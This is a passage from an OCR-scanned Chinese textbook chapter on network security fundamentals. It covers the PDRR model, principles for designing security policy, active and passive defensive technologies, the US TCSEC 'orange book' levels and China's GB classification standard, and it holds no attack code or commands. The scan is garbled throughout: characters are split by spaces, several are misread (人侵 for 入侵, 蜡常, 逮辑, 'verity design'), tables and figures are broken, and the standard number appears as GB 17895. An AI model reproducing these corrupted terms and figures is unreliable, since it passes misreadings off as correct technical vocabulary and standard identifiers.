测 工具 通常 是 一 个 网 络 安全 性 的 评估 分 析 软 件 或 者 硬件 ,用 此 类 工具 可 以 检测 出 系统 的 漏 
洞 或 潜在 的 威胁 ,以 达到 增强 网 络 安全 性 的 目的 。 

备份 是 为 了 尽 可 能 快 地 全 面 恢复 运行 计算 机 系统 所 需要 的 数据 和 系统 信息 。 备 份 不 仅 
在 网 络 系统 硬件 出 现 故障 或 人 为 操作 失误 时 起 到 保护 作用 ,也 在 入 侵 者 非 授权 访问 或 对 网 
络 攻击 及 破坏 数据 完整 性 时 起 到 保护 作用 ,同时 也 是 系统 灾难 恢复 的 前 提 之 一 。 

3. 系统 安全 

系统 安全 的 组 成 如 表 1-3 所 示 。 
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表 1-3 系统 安全 的 组 成 





反 病 毒 

系统 安全 检测 

入 侵 检测 (监控 ) 
审计 分 析 
数据 库 安 全 
数据 库 管理 系统 安全 





操作 系统 安全 





系统 安全 








数据 库 系 统 安全 














人 们 一 般 对 网 络 和 操作 系统 的 安全 很 重视 ,而 对 数据 库 的 安全 不 够 重视 。 其 实数 据 库 
系统 也 是 一 种 很 重要 的 系统 软件 ,与 其 他 软件 一 样 需 要 保护 。 

4. 应 用 安全 

应 用 安全 的 组 成 如 表 1-4 所 示 。 


表 1-4 应 用 安全 的 组 成 











各 种 编程 语言 平台 安全 
应 用 软件 开发 平台 安全 
应 用 安全 程序 本 身 的 安全 
应 用 系统 安全 应 用 软件 系统 安全 


应 用 安全 建立 在 系统 平台 之 上 ,人 们 普遍 会 重视 系统 安全 ,而 忽视 应 用 安全 。 主 要 原因 
有 : 对 应 用 安全 缺乏 认识 ; @ 应 用 系统 过 于 灵活 ,需要 掌握 较 高 的 相关 安全 技术 。 

网 络 安全 .系统 安全 和 数据 安全 的 技术 实现 有 很 多 固定 的 规则 。 应 用 安全 则 不 同 ,客户 
的 应 用 往往 各 不 相同 ,必须 投入 相对 更 多 的 人 力 、 物 力 ,而 且 没 有 现成 的 工具 ,只 能 根据 经 验 

5. 管理 安全 

安全 是 一 个 整体 ,完整 的 安全 解决 方案 不 仅 包括 物理 安全 .网络 安 全 .系统 安全 和 应 用 
安全 等 技术 手段 ,还 需要 以 人 为 核心 的 策略 和 管理 支持 。 网 络 安全 至 关 重 要 的 往往 不 是 技 
术 手 段 , 而 是 对 人 的 管理 。 无 论 采 用 了 多 么 先进 的 技术 设备 ,只 要 管理 安全 上 有 漏洞 ,那么 
这 个 系统 的 安全 就 没有 保障 。 在 网 络 管理 安全 中 .专家 们 一 致 认为 是 *30% 的 技术 ,70% 的 
管理 ”。 

同时 ,网 络 安全 不 是 一 个 目标 ,而 是 一 个 过 程 ,而 且 是 一 个 动态 的 过 程 。 这 是 因为 制约 
安全 的 因素 都 是 动态 变化 的 ,必须 通过 一 个 动态 的 过 程 来 保证 安全 。 例 如 ,Windows 操作 
系统 经 常 发 布 安全 漏洞 ,在 没有 发 现 系统 漏洞 之 前 ,大 家 可 能 认为 自己 的 系统 是 安全 的 , 实 
际 上 系统 已 经 处 于 威胁 之 中 了 ,所 以 要 及 时 地 更 新 补丁 。 

安全 是 相对 的 ,没有 绝对 的 安全 ,需要 根据 客户 的 实际 情况 ,在 实用 和 安全 之 间 找 一 个 
平衡 点 。 

从 总 体 上 来 看 ,网 络 安全 涉及 网 络 系统 的 多 个 层次 和 多 个 方面 ,同时 .也 是 一 个 动态 变 
化 的 过 程 。 网 络 安全 实际 上 是 一 个 系统 工程 , 既 涉及 对 外 部 攻击 的 有 效 防范 ,又 包括 制定 完 
善 的 内 部 安全 保障 制度 ; 既 涉及 防 病毒 攻击 ,又 涵盖 实时 检测 . 防 黑客 攻击 等 内 容 。 因 此 ,网 
络 安全 解决 方案 不 应 仅仅 提供 对 于 某 种 安全 隐患 的 防范 能 力 ,还 应 涵盖 对 于 各 种 可 能 造成 
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网 络 安全 问题 隐患 的 整体 防范 能 力 ; 同 时 ,还 应 该 是 一 种 动态 的 解决 方案 ,能 够 随 着 网 络 安 
全 需求 的 增加 而 不 断 改进 和 完善 。 





1.3.3 网络 安 全 防护 


1. PDRR 模型 

事实 上 ,安全 是 一 种 意识 ,一 个 过 程 ,而 不 仅仅 是 某 种 技术 。 进 入 21 世纪 后 ,网 络 信息 
安全 的 理念 发 生 了 巨大 的 变化 ,从 不 惜 一 切 代 价 把 入 侵 者 阻挡 在 系统 之 外 的 防御 思想 ,开始 
转变 为 防护 一 检测 一 响应 一 恢复 相 结 合 的 思想 ,出 现 了 PDRR (Protect/ Detect/React/ 
Restore) 等 网 络 安全 模型 ,如 图 1-2 所 示 。PDRR 倡导 一 种 综合 的 安全 解决 方法 ,由 防护 、 
检测 .响应 ,恢复 这 4 个 部 分 构成 一 个 动态 的 信息 安全 周期 。 





5 ) 人 xem 





恢复 响应 








图 1-2 PDRR 网 络 安全 模型 


安全 策略 的 每 一 部 分 包括 一 组 相应 的 安全 措施 来 实施 一 定 的 安全 功能 。 安 全 策略 的 第 
一 部 分 是 防护 ,根据 系统 已 知 的 所 有 安全 问题 做 出 防护 措施 ,例如 , 打 补 本 .访问 控制 和 数据 
加 密 等 。 安 全 策略 的 第 二 部 分 是 检测 ,攻击 者 如 果 穿 过 了 防护 系统 ,检测 系统 就 会 检测 出 人 
侵 者 的 相关 信息 ,一 旦 检测 出 入 侵 事件 发 生 , 响 应 系统 就 开始 采用 相应 的 安全 措施 ,如 断 开 
网 络 连接 等 。 安 全 策略 的 最 后 一 部 分 是 系统 恢复 ,在 人 侵 事件 发 生 后 ,把 系统 恢复 到 原来 的 
状态 。 每 次 发 生 和 人 侵 事 件 ,防护 系统 都 要 更 新 ,保证 相同 类 型 的 入侵 事件 不 能 再 次 发 生 , 所 
以 整个 安全 策略 包括 防护 、 检 测 、 响 应 和 恢复 ,这 4 个 方面 组 成 了 一 个 信息 安全 周期 ,使 信息 
的 安全 得 到 全 方位 的 保障 。 

1) 防护 

网 络 安全 策略 的 最 重要 的 部 分 就 是 防护 。 防 护 是 预先 阻止 攻击 可 以 发 生 的 条 件 产 生 ， 
让 攻击 者 无 法 顺利 地 入 侵 , 防 护 可 以 减少 大 多 数 的 入 侵 事 件 。 

(1) 缺陷 扫描 。 安 全 缺陷 分 为 两 种 ,允许 远程 攻击 的 缺陷 和 只 允许 本 地 攻击 的 缺陷 。 
允许 远程 攻击 的 缺陷 就 是 攻击 者 可 以 利用 该 缺陷 ,通过 网 络 攻击 系 统 。 只 允许 本 地 攻击 的 
缺陷 就 是 攻击 者 不 能 通过 网 络 利 用 该 缺陷 攻击 系统 。 对 于 允许 远程 攻击 的 安全 缺陷 ,可 以 
用 网 络 缺 陷 扫 描 工 具 去 发 现 。 网 络 缺陷 扫描 工具 一 般 从 系统 的 外 边 去 观察 。 其 次 , 它 扮演 
一 个 黑客 的 角色 ,只 不 过 它 不 会 破坏 系统 。 网 络 缺 陷 扫 描 工 具 首 先 扫 描 系 统 所 开放 的 网 络 
服务 端口 。 然 后 通过 该 端口 进行 连接 ,试探 提供 服务 的 软件 类 型 和 版 本 号 。 在 这 个 时 候 , 网 
络 缺陷 扫描 工具 有 两 种 方法 可 以 判断 该 端口 是 否 有 缺陷 : 第 一 , 根据 版 本 号 ,在 缺陷 列表 
中 查 出 是 否 存 在 缺陷 。 第 二 , 根据 已 知 的 缺陷 特征 ,模拟 一 次 攻击 ,如 果 攻 击 表示 可 能 会 成 
功 就 停止 ,并 认为 该 缺陷 存在 (要 停止 攻击 模拟 避免 对 系统 损害 )。 显 然 第 二 种 方法 的 准确 
性 比 第 一 种 要 好 ,但 是 它 扫描 的 速度 会 很 慢 。 
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(2) 访问 控制 及 防火 墙 。 访 问 控制 限制 某 些 用 户 对 某 些 资 源 的 操作 。 访 问 控制 通过 减 
少 用 户 对 资源 的 访问 ,从 而 减少 资源 被 攻击 的 概率 ,达到 防护 系统 的 目的 。 例 如 ,只 让 可 信 
的 用 户 访问 资源 ,而 不 让 其 他 用 户 访问 资源 ,这 样 资源 受到 攻击 的 概率 就 会 很 小 。 防 火 墙 是 
基于 网 络 的 访问 控制 技术 ,在 互联 网 中 已 经 有 着 广泛 的 应 用 。 防 火 墙 技术 可 以 工作 在 网 络 
层 、 传 输 层 和 应 用 层 , 完 成 不 同 程度 的 访问 控制 。 防 火 墙 可 以 阻止 大 多 数 的 攻击 但 不 是 全 
部 ,很 多 入 侵 事 件 通过 防火 墙 所 允许 的 端口 (例如 80 端口 ) 进 行 攻击 。 

(3) 防 病毒 软件 与 个 人 防火 墙 。 病 毒 就 是 计算 机 的 一 段 可 执行 代码 。 一 旦 计算 机 被 感 
染病 毒 ,这 些 可 执行 代码 可 以 自动 执行 .破坏 计算 机 系统 。 安 装 并 经 常 更 新 防 病 毒 软件 会 对 
系统 安全 起 防护 作用 。 防 病毒 软件 根据 病毒 的 特征 ,检查 用 户 系统 是 否 有 病毒 。 这 个 检查 
过 程 可 以 是 定期 检查 ,也 可 以 是 实时 检查 。 

个 人 防火 墙 是 防火 墙 和 防 病毒 的 结合 。 它 运行 在 用 户 的 系统 中 ,并 控制 其 他 机 器 对 这 
台 机 器 的 访问 。 个 人 防火 墙 除了 具有 访问 控制 功能 外 ,还 有 病毒 检测 ,甚至 有 和 人 侵 检测 的 功 
能 ,是 网 络 安全 防护 的 一 个 重要 发 展 方向 。 

(4) 数据 加 密 。 加 密 技术 保护 数据 在 存储 和 传输 中 的 保密 性 安全 。 

(5) 鉴别 技术 。 鉴 别 技 术 和 数据 加 密 技术 有 很 紧密 的 关系 。 鉴 别 技术 用 在 安全 通信 
中 ,对 通信 双方 互相 鉴别 对 方 的 身份 以 及 传输 的 数据 。 鉴 别 技术 保护 数据 通信 的 两 个 方面 : 
通信 双方 的 身份 认证 和 传输 数据 的 完整 性 。 

2) 检测 

PDRR 模型 的 第 二 个 环节 就 是 检测 。 防 护 系 统 可 以 阻止 大 多 数 入 侵 事 件 的 发 生 , 但 是 
它 不 能 阻止 所 有 的 入 侵 。 特 别 是 那些 利用 新 的 系统 缺陷 、 新 的 攻击 手段 的 入 侵 。 因 此 安全 
策略 的 第 二 个 安全 屏障 就 是 检测 , 即 如 果 入 侵 发 生 就 检测 出 来 ,这 个 工具 是 入 侵 检测 系统 
(IDS) 。 

IDS 的 功能 是 检测 出 正在 发 生 或 已 经 发 生 的 入 侵 事 件 。 这 些 入 侵 已 经 成 功 地 穿 过 防护 
战线 。 根 据 检 测 环境 不 同 ,IDS 可 以 分 为 基于 主机 的 IDS(host-based) 和 基于 网 络 的 IDS 
(Cnetwork-based) 。 基 于 主机 的 IDS 检测 基于 主机 上 的 系统 日 志 、 审 计数 据 等 信息 ;而 基于 
网 络 的 IDS 检测 则 一 般 侧重 于 网 络 流量 分 析 。 

根据 检测 所 使 用 的 方法 的 不 同 ,IDS 可 以 分 为 两 种 : 误 用 检测 (misuse detection) 和 蜡 
常 检测 (anomaly detection) 。 误 用 检测 技术 需要 建立 一 个 人 侵 规 则 库 ,其 中 , 它 对 每 一 种 人 
侵 都 形成 一 个 规则 描述 ,只 要 发 生 的 事件 与 某 个 规则 相符 合 就 被 认为 是 入 侵 。 

入 侵 检测 系统 一 般 和 应 急 响 应 及 系统 恢复 有 密切 关系 。 一 旦 入 侵 检测 系统 检测 到 入 侵 
事件 , 它 就 会 将 入 侵 事 件 的 信息 传 给 应 急 响应 系统 进行 处 理 。 

3) 响应 

PDRR 模型 中 的 第 三 个 环节 就 是 响应 。 响 应 就 是 已 知 一 个 攻击 (入 侵 ) 事 件 发 生 之 后 ， 
进行 相应 的 处 理 。 在 一 个 大 规模 的 网 络 中 ,响应 这 个 工作 都 有 一 个 特殊 部 门 来 负责 , 那 就 是 
计算 机 响应 小 组 。 世 界 上 第 一 个 计算 机 响应 小 组 CERT 于 1989 年 建立 ,位 于 美国 CMU 大 
学 的 软件 研究 所 (SED ,是 世界 上 最 著名 的 计算 机 响应 小 组 之 一 。 从 CERT 建立 之 后 ,世界 
各 国 以 及 各 机 构 也 纷纷 建立 自己 的 计算 机 响应 小 组 。 我 国 第 一 个 计算 机 紧急 响应 小 组 
CCERT 于 1999 年 建立 ,主要 服务 于 中 国教 育 和 科研 网 。 

入 侵 事 件 的 报警 可 以 是 入 侵 检测 系统 的 报警 .也 可 以 是 通过 其 他 方式 的 汇报 。 响 应 的 
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主要 工作 也 可 以 分 为 两 种 : 一 种 是 紧急 响应 ; 另 一 种 是 其 他 事件 处 理 。 紧 急 响应 就 是 当 安 
全 事件 发 生 时 及 时 采取 应 对 措施 ;其 他 事件 处 理 主要 包括 咨询 .培训 和 技术 支持 。 

4) 恢复 

恢复 是 PDRR 模型 中 的 最 后 一 个 环节 。 恢 复 是 事件 发 生 后 ,把 系统 恢复 到 原来 的 状 
态 ,或 者 恢复 到 比 原来 更 安全 的 状态 。 恢 复 也 可 以 分 为 两 个 方面 : 系统 恢复 和 信息 恢复 。 


侵 。 一 般 系统 恢复 包括 系统 升级 、 软 件 升级 和 打 补 丁 等 。 系 统 恢复 的 另 一 个 重要 工作 是 除 
去 后 门 。 一 般 来 说 ,黑客 在 第 一 次 入 侵 的 时 候 都 是 利用 系统 的 缺陷 。 在 第 一 次 入 侵 成 功 之 
后 ,黑客 就 在 系统 中 设置 一 些 后 门 , 如 安装 一 个 特洛伊 木马 。 所 以 ,尽管 对 系统 缺陷 已 经 打 
补丁 ,黑客 下 一 次 还 可 以 通过 后 门 进 入 系统 。 系 统 恢复 都 是 根据 检测 和 响应 环节 提供 有 关 
事件 的 资料 进行 的 。 

(2) 信息 恢复 。 是 指 恢复 丢失 的 数据 。 数 据 丢 失 的 原因 可 能 是 由 于 黑客 人 侵 造成 的 ， 
也 可 能 是 由 于 系统 故障 .自然 灾害 等 原因 造成 的 。 信 息 恢 复 就 是 把 备份 和 归档 的 数据 恢复 
成 原来 的 数据 。 信 息 恢复 过 程 与 数据 备份 过 程 有 很 大 的 关系 。 数 据 备份 做 得 是 否 充分 对 信 
息 恢 复 有 很 大 的 影响 。 信 息 恢 复 过 程 的 一 个 特点 是 有 优先 级 别 。 直 接 影 响 日 常生 活 和 工作 
的 信息 必须 先 恢复 ,这样 可 以 提高 信息 恢复 的 效率 。 

2. 安全 策略 设计 原则 

网 络 安全 策略 规定 了 一 系列 的 安全 防范 措施 ,从 宏观 和 微观 两 方面 保障 网 络 的 安全 。 
在 全 面 了 解 组 织 的 网 络 安全 现状 以 后 ,网 络 安全 策略 设计 者 应 遵循 一 定 的 原则 和 方法 ,在 理 
论 知识 的 指导 下 制定 出 科学 可 靠 的 网 络 安全 策略 。 虽 然 网 络 的 具体 应 用 环境 不 同 , 但 在 制 
定安 全 策略 时 应 遵循 一 些 总 的 原则 。 

(1) 适应 性 原则 。 安 全 策略 是 在 一 定 条 件 下 采取 的 安全 措施 ,必须 是 和 网 络 的 实际 应 
用 环境 相 结合 的 。 通 常 ,在 一 种 情况 下 实施 的 安全 策略 到 另 一 环境 下 未 必 适 合 ,因此 安全 策 
略 的 制定 应 充分 考虑 当前 环境 的 实际 需求 。 

(2) 木 桶 原则 。 木 桶 原则 即 “ 木 桶 的 最 大 容积 取决 于 最 短 的 那 块 木板 ”, 是 指 对 信息 进 
行 均衡 、 全 面 的 保护 。 充 分 ,全 面 、 完 整地 对 系统 的 安全 漏洞 和 安全 威胁 进行 分 析 、 评 估 和 检 
测 ( 包 括 模 拟 攻 击 ) 是 设计 信息 安全 系统 的 必要 前 提 条 件 。 安 全 机 制 和 安全 服务 设计 的 首要 
目的 是 防止 最 常用 的 攻击 手段 ,根本 目的 是 提高 整个 系统 "最 低 点 ”的 安全 性 能 。 

(3) 动态 性 原则 。 安 全 策略 是 在 一 定时 期 采取 的 安全 措施 。 由 于 网 络 动态 性 的 特点 ， 
用 户 不 断 增加 ,网 络 规模 不 断 扩 大 ,网 络 技术 本 身 的 发 展 变 化 也 很 快 ,各 种 漏洞 和 隐患 不 断 
发 现 ,而 安全 措施 是 防范 性 的 ,持续 不 断 的 ,所 以 制定 的 安全 措施 必须 能 随 着 网 络 性 能 以 及 
安全 需求 的 变化 而 变化 ,应 容易 修改 和 升级 。 

(4) 系统 性 原则 。 网 络 安全 管理 是 一 个 系统 化 的 工作 ,必须 考虑 到 整个 网 络 的 方 方 面 
面 。 也 就 是 在 制定 安全 策略 时 ,应 全 面 考虑 网 络 上 各 类 用 户 、 各 种 设备 .软件 .数据 以 及 各 种 
情况 ,有 计划 ,有 准备 地 采取 相应 的 策略 。 任 何 一 点 下 漏 都 会 造成 整个 网 络 安全 性 的 降低 。 

(5) 需求 ,代价 、 风 险 平衡 分 析 原 则 。 对 任何 一 个 网 络 而 言 , 绝 对 的 安全 是 不 可 能 达到 
的 ,也 是 不 必要 的 。 应 从 网 络 的 实际 需求 出 发 ,对 网 络 面临 的 威胁 及 可 能 承担 的 风险 进行 定 
性 与 定量 相 结 合 的 分 析 ,在 需求 ,代价 和 风险 间 寻 求 一 个 平衡 点 ,在 此 基础 上 制定 规范 和 措 
施 ,确定 系统 的 安全 策略 。 
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(6) 一 致 性 原则 。 一 致 性 原则 主要 是 指 网 络 安全 问题 应 与 整个 网 络 的 工作 周期 (或 生 
命 周期 ) 同 时 存在 ,制定 的 安全 体系 结构 必须 与 网 络 安全 需求 相 一 致 ,在 网 络 系统 设计 及 实 
施 计划 、 网 络 验证 、 验 收 、 运 行 等 网 络 生命 周期 的 各 个 阶段 ,都 要 制定 相应 的 安全 策略 。 

(7) 最 小 授权 原则 。 从 网 络 安全 的 角度 考虑 问题 ,打开 的 服务 越 多 ,可 能 出 现 的 安全 漏 
洞 就 会 越 多 。 最 小 授权 原则 指 的 是 网 络 中 账号 设置 .服务 配置 .主机 间 信 任 关 系 配 置 等 应 该 
为 网 络 正常 运行 所 需 的 最 小 限度 。 关 闭 网 络 安全 策略 中 没有 定义 的 网 络 服务 并 将 用 户 的 权 
限 配置 为 策略 定义 的 最 小 限度 、 及 时 删除 不 必要 的 账号 等 措施 可 以 将 系统 的 危险 性 大 大 降 
低 。 在 没有 明确 的 安全 策略 的 网 络 环境 中 ,网 络 安全 管理 员 通 过 简单 关闭 不 必要 或 者 不 了 
解 的 网 络 服务 .删除 主机 信任 关系 、 及 时 删除 不 必要 的 账号 等 手段 也 可 以 将 入 侵 危 险 降 低 一 
半 以 上 。 

(8) 整体 性 原则 。 要 求 在 发 生 被 攻击 、 破 坏事 件 的 情况 下 ,必须 尽 可 能 地 快速 恢复 信息 
系统 的 服务 ,减少 损失 。 因 此 ,信息 安全 系统 应 该 包括 安全 防护 机 制 、 安 全 检测 机 制 和 安全 
恢复 机 制 。 

(9) 技术 与 管理 相 结 合 原则 。 安 全 体系 是 一 个 复杂 的 系统 工程 ,涉及 人 、 技 术 、 操 作 等 
各 方面 要 素 , 单 靠 技术 或 管理 都 不 可 能 实现 。 因 此 ,必须 将 各 种 安全 技术 与 运行 管理 机 制 、 
人 员 思 想 教育 与 技术 培训 、 安 全 规章 制度 建设 相 结合 。 

(10) 易 操 作 性 原则 。 首 先 ,安全 措施 需要 人 为 地 去 完成 ,如 果 措 施 过 于 复杂 ,对 人 的 要 
求 过 高 ,本身 就 降低 了 安全 性 ;其 次 ,措施 的 采用 不 能 影响 系统 的 正常 运行 。 

3. 网 络 安全 保障 技术 

网 络 安全 强调 的 是 通过 采用 各 种 安全 技术 和 管理 上 的 安全 措施 ,确保 网 络 数据 在 公用 
网 络 系统 中 传输 、 交 换 和 存储 流通 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 。 网 络 安 
全 技术 是 在 网 络 攻 击 的 对 抗 中 不 断 发 展 的 , 它 大 致 经 历 了 从 静态 到 动态 .从 被 动 防范 至 主动 
防范 的 发 展 过 程 。 当 前 采用 的 网 络 信息 安全 保护 技术 主要 有 两 类 : 主动 防御 保护 技术 和 被 
动 防御 保护 技术 。 

1) 主动 防御 保护 技术 

主动 防御 保护 技术 一 般 采 用 数据 加 密 、 身 份 鉴别 ,访问 控制 和 虚拟 专用 网 络 等 技术 来 

(1) 数据 加 密 。 密 码 技术 被 公认 为 是 保护 网 络 信息 安全 的 最 实用 的 方法 ,人 们 普遍 认 
为 ,对 数据 最 有 效 的 保护 就 是 加 密 。 

(2) 身份 鉴别 。 身 份 鉴别 强调 一 致 性 验证 ,通常 包括 验证 依据 、 验 证 系统 和 安全 要 求 。 

(3) 访问 控制 。 访 问 控制 指 主 体 对 何 种 客体 具有 何 种 操作 权力 。 访 问 控制 是 网 络 安全 
防范 和 保护 的 主要 策略 ,根据 控制 手段 和 具体 目的 的 不 同 , 可 以 将 访问 控制 技术 分 为 人 网 访 
问 控制 .网 络 权 限 控制 .目录 级 安全 控制 和 属性 安全 控制 等 。 访 问 控制 的 内 容 包 括 人 员 限 
制 . 访 问 权 限 设置 .数据 标识 .控制 类 型 和 风险 分 析 。 

(4) 虚拟 专用 网 络 。 虚 拟 专用 网 络 (VPN) 是 在 公 网 基础 上 进行 逮 辑 分 隔 而 虚拟 构建 的 
一 种 特殊 通信 环境 ,使 用 虚拟 专用 网 络 或 虚拟 局 域 网 技术 ,能 确保 其 具有 私有 性 和 隐蔽 性 。 

2) 被 动 防御 保护 技术 

被 动 防御 保护 技术 主要 有 防火 墙 技 术 、 入 侵 检 测 系 统 、 安 全 扫描 器 ,口令 验证 ,审计 跟 
踪 、 物 理 保护 及 安全 管理 等 。 
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(1) 防火 墙 技 术 。 防 火 墙 是 内 部 网 与 外 部 网 之 间 实 施 安全 防范 的 系统 ,可 被 认为 是 一 
种 访问 控制 机 制 , 用 于 确定 哪些 内 部 服务 允许 外 部 访问 ,以 及 哪些 外 部 服务 允许 内 部 访问 。 

(2) 入 侵 检 测 系统 。 入 侵 检测 系统 (IDS) 是 在 系统 中 的 检查 位 置 执 行人 侵 检测 功能 的 
程序 或 硬件 执行 体 ,可 对 当前 的 系统 资源 和 状态 进行 监控 ,检测 可 能 的 入 侵 行为 。 

(3) 安全 扫描 器 。 安 全 扫描 器 是 可 自动 检测 远程 或 本 地 主机 及 网 络 系统 的 安全 性 漏洞 
的 专用 功能 程序 ,可 用 于 观察 网 络 信息 系统 的 运行 情况 。 

(4) 口令 验证 。 口令 验 证 可 有 效 防止 攻击 者 假冒 身份 登录 系统 。 

(5) 审计 跟踪 。 与 安全 相关 的 事件 记录 在 系统 日 志文 件 中 ,事后 可 以 对 网 络 信 息 系 统 
的 运行 状态 进行 详尽 审计 ,帮助 发 现 系 统 存 在 的 安全 弱点 和 入 侵 点 ,尽量 降低 安全 风险 。 

(6) 物理 保护 及 安全 管理 。 如 实行 安全 隔离 ;通过 制定 标准 、 管 理 办 法 和 条 例 , 对 物理 
实体 和 信息 系统 加 强 规 范 管理 ,减少 人 为 因素 的 干扰 。 





1.3.4 网 络 安全 标准 


1. 美国 的 TCSEC 

可 信 计 算 机 系统 评价 准则 (trusted computer system evaluation criteria,TCSEC) ,又 称 
为 橘 皮 书 , 它 将 计算 机 系统 的 安全 等 级 划分 为 A、B、C、D 共 4 类 7 个 级 别 , 如 表 1-5 所 示 。 
其 中 ,A 类 安全 等 级 最 高 ,D 类 安全 等 级 最 低 。 它 是 计算 机 系统 安全 评估 的 第 一 个 正式 标 
准 , 具 有 划时代 的 意义 。 该 准则 于 1970 年 由 美国 国防 科学 委员 会 提出 ,并 于 1985 年 12 月 
由 美国 国防 部 公布 。TCSEC 最 初 只 是 军用 标准 ,后 来 扩展 至 民用 领域 。 


























表 1-5 安全 等 级 
类 别 级 别 名 称 主要 特征 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 
B3 安全 区 域 存 取 监 督 ,安全 内 核 , 高 抗 渗透 能 力 

B B2 结构 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
Bl 标识 安全 保护 强制 存 取 控制 ,安全 标识 

C2 访问 控制 保护 存 取 控制 以 用 户 为 单位 ,广泛 的 审计 、 跟 踪 
cl 选择 性 安全 保护 有 选择 的 存 取 控 制 , 用 户 与 数据 分 离 

D D 低级 保护 没有 安全 保护 











(1) D 级 。 DD 级 是 最 低 的 安全 形式 ,整个 系统 是 不 可 信任 的 。 拥 有 这 个 级 别 的 操作 系 
统 就 像 一 个 敞开 大 门 的 房子 ,任何 人 可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 , 没 
有 任何 保护 措施 ;对 于 操作 系统 来 说 很 容易 受到 损害 。 没 有 系统 访问 限制 和 数据 访问 限制 ， 
任何 人 不 需要 账户 就 可 以 进入 系统 ,不 受 任何 限制 就 可 以 访问 他 人 的 数据 文件 。 具 有 该 安 
全 级 别 的 典型 操作 系统 有 MS-DOS、Windows 98、Macintosh 7.x 等 。 

(2) C 级 。C 级 安全 级 别 能 够 提供 审慎 的 保护 功能 ,并 具有 对 用 户 的 行为 和 责任 进行 
审计 的 能 力 。 该 安全 级 别 又 由 Cl 和 C2 两 个 子安 全 级 别 共同 组 成 。 

Cl 级 ,又 称 选择 性 安全 保护 级 别 , 它 要 求 系统 硬件 有 一 定 的 安全 保护 (如 硬件 有 带 锁 装 
置 ,需要 钥匙 才能 使 用 计算 机 ) ,用 户 在 使 用 前 必须 登录 到 系统 。 另 外 ,作为 Cl 级 保护 的 一 
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部 分 ,允许 系统 管理 员 为 一 些 程序 或 数据 设立 访问 许可 权限 等 。 

C2 级 ,又 称 访问 控制 保护 级 别 , 除 Cl 级 所 包含 的 特性 外 ,还 具有 访问 控制 环境 
(controlled access environment) 的 安全 特征 。 访 问 控制 环境 具有 进一步 限制 用 户 执行 某 些 
命令 或 访问 某 些 文件 的 能 力 , 这 不 仅仅 是 基于 许可 权限 ,而且 还 是 基于 身份 验证 级 别 。 这 种 
级 别 要 求 对 系统 加 以 审计 (Audit) ,并 写 入 日 志 中 ,例如 ,用 户 何 时 开机 、 哪 个 用 户 在 何 时 何 
地 登录 系统 等 。 通 过 查看 日 志 信息 ,就 可 以 发 现 人 侵 的 痕迹 ,如 发 现 多 次 登录 失败 的 日 志 信 
息 ,那么 可 大 致 得 出 有 人 想 人 侵 系 统 。 另 外 ,审计 用 来 跟踪 记录 所 有 与 安全 有 关 的 事件 , 比 
如 系统 管理 员 所 执行 的 操作 活动 ,审计 对 身份 的 验证 。 审 计 的 缺点 就 是 需要 额外 的 处 理 器 
时 间 和 磁盘 空间 。Linux、UNIX、Windows NT、Windows 2000 和 Windows Server 2008 属 
于 这 个 级 别 。 

(3) B 级 。B 级 具有 强制 性 保护 功能 ,强制 性 保护 意味 着 如 果 用 户 没有 与 安全 等 级 相 
连 , 系 统 就 不 会 允许 用 户 存 取 对 象 。B 级 又 可 细 分 为 Bl1、B2 和 B3 三 个 子安 全 级 别 。 

Bl 级 ,又 称 标识 安全 保护 (labeled security protection) 级 别 ,是 支持 多 级 安全 (比如 秘 
密 和 绝密 ) 的 第 一 个 级 别 。 对 象 (如 盘 区 .文件 服务 器 目录 等 ) 必 须 在 强制 性 访问 控制 之 下 ， 
系统 不 允许 文件 的 拥有 者 更 改 它们 的 许可 权限 。 

B2 级 ,又 称 结构 保护 (structured protection) 级 别 , 要 求 计 算 机 系统 中 所 有 的 对 象 都 要 
加 注 标签 ,而 且 还 给 设备 (如 磁盘 、 磁 带 等 ) 分 配 单个 或 多 个 安全 级 别 。 

B3 级 ,又 称 安全 区 域 (security domain) 级 别 , 使 用 安装 硬件 的 方式 来 加 强 域 的 安全 。 
例如 ,安装 内 存 管理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 更 改 其 他 安全 域 的 对 象 。 该 级 
别 也 要 求 用 户 的 终端 通过 一 条 可 信任 的 途径 连接 到 系统 上 。 

(4) A 级 。A 级 又 称 为 验证 设计 (verity design) 级 别 , 是 当前 橘 皮 书 的 最 高 级 别 , 包 括 
一 个 严格 的 设计 、 控 制 和 验证 过 程 。 与 前 面 提 到 的 各 级 别 一 样 ,这 一 级 别 包含 了 较 低 级 别 的 
所 有 的 安全 特性 。 安 全 设计 必须 是 从 数学 角度 上 经 过 验证 的 ,而 且 必 须 进行 秘密 通道 和 可 
信任 分 布 的 分 析 。 可 信任 分 布 (trusted distribution) 的 含义 是 : 硬件 和 软件 在 物理 传输 过 
程 中 受到 保护 ,以 防止 破坏 安全 系统 。 

2. 我 国 的 安全 标准 

我 国 的 安全 标准 主要 是 于 2001 年 1 月 1 日 起 实施 的 由 公安 部 主持 制定 .国家 技术 标准 局 
发 布 的 中 华人 民 共 和 国标 准 ( 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》(GB 17895 一 1999)。 
该 准则 将 信息 系统 安全 划分 为 5 个 等 级 ,分 别 是 自主 保护 级 、 系 统 审计 保护 级 、 安 全 标记 保 
护 级 、 结 构 化 保护 级 和 访问 验证 保护 级 。 

(1) 自主 保护 级 。 本 级 的 安全 保护 机 制 使 用 户 具备 自主 安全 保护 能 力 ,保护 用 户 和 用 
户 组 信息 ,避免 其 他 用 户 对 数据 的 非法 读 / 写 和 破坏 。 

(2) 系统 审计 保护 级 。 本 级 的 安全 保护 机 制 具 备 第 一 级 的 所 有 安全 保护 功能 ,并 创建 、 
维护 访问 审计 跟踪 记录 ,以 记录 与 系统 安全 相关 事件 发 生 的 日 期 \ 时 间 、 用 户 和 事件 类 型 等 
信息 ,使 所 有 用 户 对 自己 行为 的 合法 性 负责 。 

(3) 安全 标记 保护 级 。 本 级 的 安全 保护 机 制 具备 系统 审计 保护 级 的 所 有 安全 功能 ,并 
为 访问 者 和 访问 对 象 指定 安全 标记 ,以 访问 对 象 标记 的 安全 级 别 限 制 访问 者 的 访问 权限 , 实 
现 对 访问 对 象 的 强制 保护 。 

(4) 结构 化 保护 级 。 本 级 的 安全 保护 机 制 具备 安全 标记 保护 级 的 所 有 安全 功能 ,并 将 
